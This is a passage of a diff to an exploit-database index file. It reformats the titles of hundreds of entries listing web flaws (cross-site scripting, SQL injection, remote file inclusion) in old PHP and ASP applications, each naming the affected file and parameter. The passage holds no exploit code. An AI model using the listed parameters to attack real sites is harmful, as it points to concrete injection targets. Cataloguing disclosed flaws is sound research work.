Scripting",2006-06-12,Luny,php,webapps,0 -28010,platforms/php/webapps/28010.txt,"Five Star Review Script - report.php item_id Parameter Cross-Site Scripting",2006-06-12,Luny,php,webapps,0 +28009,platforms/php/webapps/28009.txt,"Five Star Review Script - 'index2.php?sort' Cross-Site Scripting",2006-06-12,Luny,php,webapps,0 +28010,platforms/php/webapps/28010.txt,"Five Star Review Script - 'report.php?item_id' Cross-Site Scripting",2006-06-12,Luny,php,webapps,0 28011,platforms/php/webapps/28011.txt,"iFoto 0.20 - 'index.php' Cross-Site Scripting",2006-06-12,Luny,php,webapps,0 28012,platforms/php/webapps/28012.txt,"Foing 0.x - Remote File Inclusion",2006-06-12,Darkfire,php,webapps,0 28013,platforms/php/webapps/28013.txt,"SixCMS 6.0 - list.php Cross-Site Scripting",2006-06-12,Aesthetico,php,webapps,0 28014,platforms/php/webapps/28014.txt,"SixCMS 6.0 - detail.php Directory Traversal",2006-06-12,Aesthetico,php,webapps,0 28015,platforms/php/webapps/28015.txt,"iFusion iFlance 1.1 - Multiple Input Validation Vulnerabilities",2006-06-12,Luny,php,webapps,0 -28016,platforms/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Inclusion",2006-06-13,R@1D3N,php,webapps,0 -28017,platforms/php/webapps/28017.txt,"CEScripts - Multiple Scripts Cross-Site Scripting Vulnerabilities",2006-06-13,Luny,php,webapps,0 +28016,platforms/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Inclusions",2006-06-13,R@1D3N,php,webapps,0 +28017,platforms/php/webapps/28017.txt,"CEScripts (Multiple Scripts) - Cross-Site Scripting",2006-06-13,Luny,php,webapps,0 28018,platforms/php/webapps/28018.txt,"VBZoom 1.0/1.1 - Multiple SQL Injections",2006-06-13,"CrAzY CrAcKeR",php,webapps,0 28019,platforms/php/webapps/28019.txt,"Simpnews 2.x - 'Wap_short_news.php' Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 28020,platforms/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'index.php' imgdir Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0 -28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - popup.php Multiple Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0 +28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'popup.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-13,black-cod3,php,webapps,0 28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injections",2006-06-14,"CrAzY CrAcKeR",php,webapps,0 28023,platforms/php/webapps/28023.txt,"Confixx 3.0/3.1 - FTP_index.php Cross-Site Scripting",2006-06-14,kr4ch,php,webapps,0 28024,platforms/php/webapps/28024.txt,"phpBB - 'BBRSS.php' Remote File Inclusion",2006-06-14,SpC-x,php,webapps,0 28025,platforms/php/webapps/28025.txt,"RahnemaCo - 'page.php' Remote File Inclusion",2006-06-14,Breeeeh,php,webapps,0 -28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0 +28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Inclusions",2006-06-14,"Federico Fazzi",php,webapps,0 28028,platforms/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps,0 28060,platforms/php/webapps/28060.txt,"Datecomm 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-19,Luny,php,webapps,0 28059,platforms/php/webapps/28059.txt,"SaphpLesson 1.1/2.0/3.0 - Multiple SQL Injections",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 @@ -30243,89 +30244,89 @@ id,file,description,date,author,platform,type,port 28032,platforms/php/webapps/28032.txt,"MPCS 0.2 - comment.php Cross-Site Scripting",2006-03-06,Luny,php,webapps,0 28033,platforms/php/webapps/28033.txt,"VBZoom 1.11 - forum.php SQL Injection",2006-06-15,CrAsh_oVeR_rIdE,php,webapps,0 28034,platforms/php/webapps/28034.txt,"Ji-takz - Remote File Inclusion",2006-06-16,SpC-x,php,webapps,0 -28035,platforms/php/webapps/28035.txt,"mcGuestbook 1.3 - admin.php lang Parameter Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 -28036,platforms/php/webapps/28036.txt,"mcGuestbook 1.3 - ecrire.php lang Parameter Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 -28037,platforms/php/webapps/28037.txt,"mcGuestbook 1.3 - lire.php lang Parameter Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 -28038,platforms/php/webapps/28038.txt,"Indexu 5.0.1 - Multiple Remote File Inclusion",2006-06-16,CrAsh_oVeR_rIdE,php,webapps,0 -28039,platforms/php/webapps/28039.txt,"dotWidget for articles 2.0 - showcatpicks.php file_path Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 -28040,platforms/php/webapps/28040.txt,"dotWidget for articles 2.0 - showarticle.php file_path Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 -28041,platforms/php/webapps/28041.txt,"dotWidget for articles 2.0 - admin/authors.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 -28042,platforms/php/webapps/28042.txt,"dotWidget for articles 2.0 - admin/articles.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 -28043,platforms/php/webapps/28043.txt,"dotWidget for articles 2.0 - admin/index.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 -28045,platforms/php/webapps/28045.txt,"dotWidget for articles 2.0 - admin/categories.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 +28035,platforms/php/webapps/28035.txt,"mcGuestbook 1.3 - 'admin.php?lang' Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 +28036,platforms/php/webapps/28036.txt,"mcGuestbook 1.3 - 'ecrire.php?lang' Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 +28037,platforms/php/webapps/28037.txt,"mcGuestbook 1.3 - 'lire.php?lang' Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 +28038,platforms/php/webapps/28038.txt,"Indexu 5.0.1 - Multiple Remote File Inclusions",2006-06-16,CrAsh_oVeR_rIdE,php,webapps,0 +28039,platforms/php/webapps/28039.txt,"dotWidget for articles 2.0 - 'showcatpicks.php?file_path' Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 +28040,platforms/php/webapps/28040.txt,"dotWidget for articles 2.0 - 'showarticle.php?file_path' Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 +28041,platforms/php/webapps/28041.txt,"dotWidget for articles 2.0 - 'admin/authors.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 +28042,platforms/php/webapps/28042.txt,"dotWidget for articles 2.0 - 'admin/articles.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 +28043,platforms/php/webapps/28043.txt,"dotWidget for articles 2.0 - 'admin/index.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 +28045,platforms/php/webapps/28045.txt,"dotWidget for articles 2.0 - 'admin/categories.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 28063,platforms/php/webapps/28063.txt,"e107 0.7.5 - search.php Cross-Site Scripting",2006-06-19,securityconnection,php,webapps,0 28064,platforms/php/webapps/28064.txt,"Qto File Manager 1.0 - 'index.php' Cross-Site Scripting",2006-03-06,alijsb,php,webapps,0 -28066,platforms/php/webapps/28066.txt,"Singapore 0.9.x/0.10 - Multiple Parameter Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0 +28066,platforms/php/webapps/28066.txt,"Singapore 0.9.x/0.10 - Multiple Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0 28067,platforms/php/webapps/28067.txt,"Singapore 0.9.x/0.10 - 'index.php' template Parameter Cross-Site Scripting",2006-06-19,simo64,php,webapps,0 -28068,platforms/php/webapps/28068.txt,"V3 Chat Instant Messenger - mail/index.php id Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 -28069,platforms/php/webapps/28069.txt,"V3 Chat Instant Messenger - mail/reply.php id Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 -28070,platforms/php/webapps/28070.txt,"V3 Chat Instant Messenger - online.php site_id Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 -28071,platforms/php/webapps/28071.txt,"V3 Chat Instant Messenger - search.php Multiple Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 -28072,platforms/php/webapps/28072.txt,"V3 Chat Instant Messenger - profile.php site_id Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 -28073,platforms/php/webapps/28073.txt,"V3 Chat Instant Messenger - profileview.php membername Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 -28074,platforms/php/webapps/28074.txt,"V3 Chat Instant Messenger - expire.php cust_name Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 +28068,platforms/php/webapps/28068.txt,"V3 Chat Instant Messenger - 'mail/index.php?id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 +28069,platforms/php/webapps/28069.txt,"V3 Chat Instant Messenger - 'mail/reply.php?id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 +28070,platforms/php/webapps/28070.txt,"V3 Chat Instant Messenger - 'online.php?site_id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 +28071,platforms/php/webapps/28071.txt,"V3 Chat Instant Messenger - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-20,Luny,php,webapps,0 +28072,platforms/php/webapps/28072.txt,"V3 Chat Instant Messenger - 'profile.php?site_id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 +28073,platforms/php/webapps/28073.txt,"V3 Chat Instant Messenger - 'profileview.php?membername' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 +28074,platforms/php/webapps/28074.txt,"V3 Chat Instant Messenger - 'expire.php?cust_name' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 28076,platforms/php/webapps/28076.txt,"vBulletin 3.0.9/3.5.x - member.php Cross-Site Scripting",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 28078,platforms/php/webapps/28078.txt,"e107 0.7.5 - 'Subject' HTML Injection",2006-06-21,"EllipSiS Security",php,webapps,0 28086,platforms/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 - Error_msg Parameter Cross-Site Scripting",2006-06-21,"Charles Hooper",asp,webapps,0 28088,platforms/php/webapps/28088.txt,"PHP Event Calendar 4.2 - SQL Injection",2006-06-22,Silitix,php,webapps,0 -28089,platforms/php/webapps/28089.txt,"Woltlab Burning Board 1.2/2.0/2.3 - newthread.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 -28090,platforms/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 - report.php postid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 -28091,platforms/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 - showmods.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 +28089,platforms/php/webapps/28089.txt,"Woltlab Burning Board 1.2/2.0/2.3 - 'newthread.php?boardid' SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 +28090,platforms/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 - 'report.php?postid' SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 +28091,platforms/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 - 'showmods.php?boardid' SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28092,platforms/php/webapps/28092.txt,"MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection",2006-06-22,imei,php,webapps,0 28093,platforms/php/webapps/28093.txt,"SoftBizScripts Dating Script 1.0 - 'featured_photos.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28094,platforms/php/webapps/28094.txt,"SoftBizScripts Dating Script 1.0 - 'products.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28095,platforms/php/webapps/28095.txt,"SoftBizScripts Dating Script 1.0 - 'index.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28096,platforms/php/webapps/28096.txt,"SoftBizScripts Dating Script 1.0 - 'news_desc.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0 -28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0 +28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusions",2006-06-22,Shm,php,webapps,0 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 - Thumb.php Cross-Site Scripting",2006-06-24,Luny,php,webapps,0 28104,platforms/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0 28105,platforms/php/webapps/28105.txt,"eNpaper1 - 'Root_Header.php' Remote File Inclusion",2006-06-26,almaster,php,webapps,0 -28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusion",2006-06-16,Kw3[R]Ln,php,webapps,0 +28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusions",2006-06-16,Kw3[R]Ln,php,webapps,0 28107,platforms/php/webapps/28107.txt,"cPanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0 28108,platforms/php/webapps/28108.txt,"MyMail 1.0 - 'login.php' Cross-Site Scripting",2006-06-26,botan,php,webapps,0 28109,platforms/php/webapps/28109.txt,"Usenet 0.5 - 'index.php' Cross-Site Scripting",2006-06-23,Luny,php,webapps,0 28110,platforms/php/webapps/28110.txt,"MVNForum Activatemember 1.0 - Cross-Site Scripting",2006-06-26,r0t,php,webapps,0 -28111,platforms/php/webapps/28111.txt,"OpenGuestbook 0.5 - header.php title Parameter Cross-Site Scripting",2006-06-26,simo64,php,webapps,0 -28112,platforms/php/webapps/28112.txt,"OpenGuestbook 0.5 - view.php offset Parameter SQL Injection",2006-06-26,simo64,php,webapps,0 +28111,platforms/php/webapps/28111.txt,"OpenGuestbook 0.5 - 'header.php?title' Cross-Site Scripting",2006-06-26,simo64,php,webapps,0 +28112,platforms/php/webapps/28112.txt,"OpenGuestbook 0.5 - 'view.php?offset' SQL Injection",2006-06-26,simo64,php,webapps,0 28113,platforms/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 - OnMouseover Cross-Site Scripting",2006-06-27,MexHackTeam.org,php,webapps,0 28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 - 'Cookbook.php' Remote File Inclusion",2006-06-27,CrAzY.CrAcKeR,php,webapps,0 28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 - admin.php Cross-Site Scripting",2006-06-27,botan,php,webapps,0 28116,platforms/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,java,webapps,0 28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 - 'admin.php' Remote File Inclusion",2006-06-27,botan,php,webapps,0 -28119,platforms/php/webapps/28119.txt,"vCard PRO - gbrowse.php cat_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 -28120,platforms/php/webapps/28120.txt,"vCard PRO - rating.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 -28121,platforms/php/webapps/28121.txt,"vCard PRO - create.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 -28122,platforms/php/webapps/28122.txt,"vCard PRO - search.php event_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 +28119,platforms/php/webapps/28119.txt,"vCard PRO - 'gbrowse.php?cat_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 +28120,platforms/php/webapps/28120.txt,"vCard PRO - 'rating.php?card_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 +28121,platforms/php/webapps/28121.txt,"vCard PRO - 'create.php?card_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 +28122,platforms/php/webapps/28122.txt,"vCard PRO - 'search.php?event_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 -28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value' Parameter SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 +28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php?value' SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass",2013-09-06,shiZheni,php,webapps,0 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0 -28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 -28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 -28134,platforms/php/webapps/28134.txt,"newsPHP 2006 PRO - inc/rss_feed.php category Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 +28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-29,securityconnection,php,webapps,0 +28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple SQL Injections",2006-06-29,securityconnection,php,webapps,0 +28134,platforms/php/webapps/28134.txt,"newsPHP 2006 PRO - 'inc/rss_feed.php?category' SQL Injection",2006-06-29,securityconnection,php,webapps,0 28136,platforms/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - Diver.php SQL Injection",2006-06-23,DarkFig,php,webapps,0 -28137,platforms/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 - insertmember.php city Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 -28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - lostpassword.php PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 -28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 - gen_confirm_mem.php PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 +28137,platforms/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 - 'insertmember.php?city' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 +28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - 'lostpassword.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 +28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 - 'gen_confirm_mem.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28140,platforms/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 - 'index.php' PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX - 'top.php' Remote File Inclusion",2006-06-01,MazaGi,php,webapps,0 28142,platforms/php/webapps/28142.txt,"Diesel Joke Site - 'Category.php' SQL Injection",2006-07-01,black-code,php,webapps,0 28143,platforms/php/webapps/28143.pl,"SturGeoN Upload - Arbitrary File Upload",2006-07-01,"Jihad BENABRA",php,webapps,0 28146,platforms/php/webapps/28146.txt,"Vincent Leclercq News 5.2 - Cross-Site Scripting",2006-07-03,DarkFig,php,webapps,0 28147,platforms/php/webapps/28147.txt,"Plume CMS 1.0.4 - 'index.php' _PX_config[manager_path] Parameter Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28148,platforms/php/webapps/28148.txt,"Plume CMS 1.0.4 - rss.php _PX_config[manager_path] Parameter Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28149,platforms/php/webapps/28149.txt,"Plume CMS 1.0.4 - search.php _PX_config[manager_path] Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28148,platforms/php/webapps/28148.txt,"Plume CMS 1.0.4 - 'rss.php?_PX_config[manager_path]' Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28149,platforms/php/webapps/28149.txt,"Plume CMS 1.0.4 - 'search.php?_PX_config[manager_path]' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28150,platforms/php/webapps/28150.txt,"free QBoard 1.1 - 'index.php' qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28151,platforms/php/webapps/28151.txt,"free QBoard 1.1 - about.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28152,platforms/php/webapps/28152.txt,"free QBoard 1.1 - contact.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28153,platforms/php/webapps/28153.txt,"free QBoard 1.1 - delete.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28154,platforms/php/webapps/28154.txt,"free QBoard 1.1 - faq.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28155,platforms/php/webapps/28155.txt,"free QBoard 1.1 - features.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 -28156,platforms/php/webapps/28156.txt,"free QBoard 1.1 - history.php qb_path Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28151,platforms/php/webapps/28151.txt,"free QBoard 1.1 - 'about.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28152,platforms/php/webapps/28152.txt,"free QBoard 1.1 - 'contact.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28153,platforms/php/webapps/28153.txt,"free QBoard 1.1 - 'delete.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28154,platforms/php/webapps/28154.txt,"free QBoard 1.1 - 'faq.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28155,platforms/php/webapps/28155.txt,"free QBoard 1.1 - 'features.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 +28156,platforms/php/webapps/28156.txt,"free QBoard 1.1 - 'history.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28157,platforms/php/webapps/28157.txt,"VirtuaStore 2.0 - Password Parameter SQL Injection",2006-07-03,supermalhacao,php,webapps,0 28158,platforms/php/webapps/28158.txt,"QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-07-03,"EllipSiS Security",php,webapps,0 28159,platforms/php/webapps/28159.txt,"Glossaire 1.7 - Remote File Inclusion",2006-07-03,"CrAzY CrAcKeR",php,webapps,0 @@ -30336,22 +30337,22 @@ id,file,description,date,author,platform,type,port 28167,platforms/php/webapps/28167.txt,"Invision Power Board 1.x/2.x - Multiple SQL Injections",2006-07-05,"CrAzY CrAcKeR",php,webapps,0 28168,platforms/php/webapps/28168.txt,"Blog:CMS 4.1 - 'Thumb.php' Remote File Inclusion",2006-07-05,"EllipSiS Security",php,webapps,0 28171,platforms/php/webapps/28171.txt,"Zyxware Health Monitoring System - Multiple Vulnerabilities",2013-09-09,"Sarahma Security",php,webapps,0 -28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 - Stylesheet.php MosConfig_absolute_path Parameter Remote File Inclusion",2006-07-25,botan,php,webapps,0 +28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 - 'Stylesheet.php?MosConfig_absolute_path' Remote File Inclusion",2006-07-25,botan,php,webapps,0 28174,platforms/php/webapps/28174.txt,"Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps,0 28175,platforms/linux/webapps/28175.txt,"Sophos Web Protection Appliance - Multiple Vulnerabilities",2013-09-09,"Core Security",linux,webapps,0 -28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - 'create_course.php' Multiple Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - 'create_course.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-06,"Security News",php,webapps,0 28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x - 'documentation/admin/index.php' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x - 'password_reminder.php' forgot Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 -28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - 'admin/fix_content.php submit' Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - 'admin/fix_content.php?submit' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 -28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php cat_id' Parameter SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 +28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php?cat_id' SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28190,platforms/php/webapps/28190.txt,"Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 28191,platforms/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps,0 28192,platforms/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,php,webapps,0 28193,platforms/asp/webapps/28193.txt,"Webvizyon - SayfalaAltList.asp SQL Injection",2006-07-08,StorMBoY,asp,webapps,0 28195,platforms/php/webapps/28195.txt,"RW::Download - 'stats.php' Remote File Inclusion",2006-07-08,StorMBoY,php,webapps,0 -28199,platforms/php/webapps/28199.txt,"Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusion",2006-07-09,h4ntu,php,webapps,0 +28199,platforms/php/webapps/28199.txt,"Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusions",2006-07-09,h4ntu,php,webapps,0 28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 - 'Tiny_mce_gzip.php' Directory Traversal",2006-07-10,armin390,php,webapps,0 28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 - Topics.php SQL Injection",2006-07-10,Paisterist,php,webapps,0 28203,platforms/asp/webapps/28203.txt,"Hosting Controller 1.x - error.asp Cross-Site Scripting",2006-07-11,Dea7h,asp,webapps,0 @@ -30359,15 +30360,15 @@ id,file,description,date,author,platform,type,port 28205,platforms/php/webapps/28205.txt,"FlexWATCH Network Camera - Cross-Site Scripting",2006-06-11,"Jaime Blasco",php,webapps,0 28206,platforms/php/webapps/28206.txt,"Fantastic Guestbook 2.0.1 - Guestbook.php HTML Injection",2006-07-11,omnipresent,php,webapps,0 28208,platforms/asp/webapps/28208.txt,"FlexWATCH 3.0 - AIndex.asp Authentication Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0 -28211,platforms/php/webapps/28211.txt,"Lazarus Guestbook 1.6 - codes-english.php show Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 -28212,platforms/php/webapps/28212.txt,"Lazarus Guestbook 1.6 - picture.php img Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 -28214,platforms/php/webapps/28214.txt,"PhotoCycle 1.0 - PhotoCycle.php Parameter Cross-Site Scripting",2006-07-13,Luny,php,webapps,0 +28211,platforms/php/webapps/28211.txt,"Lazarus Guestbook 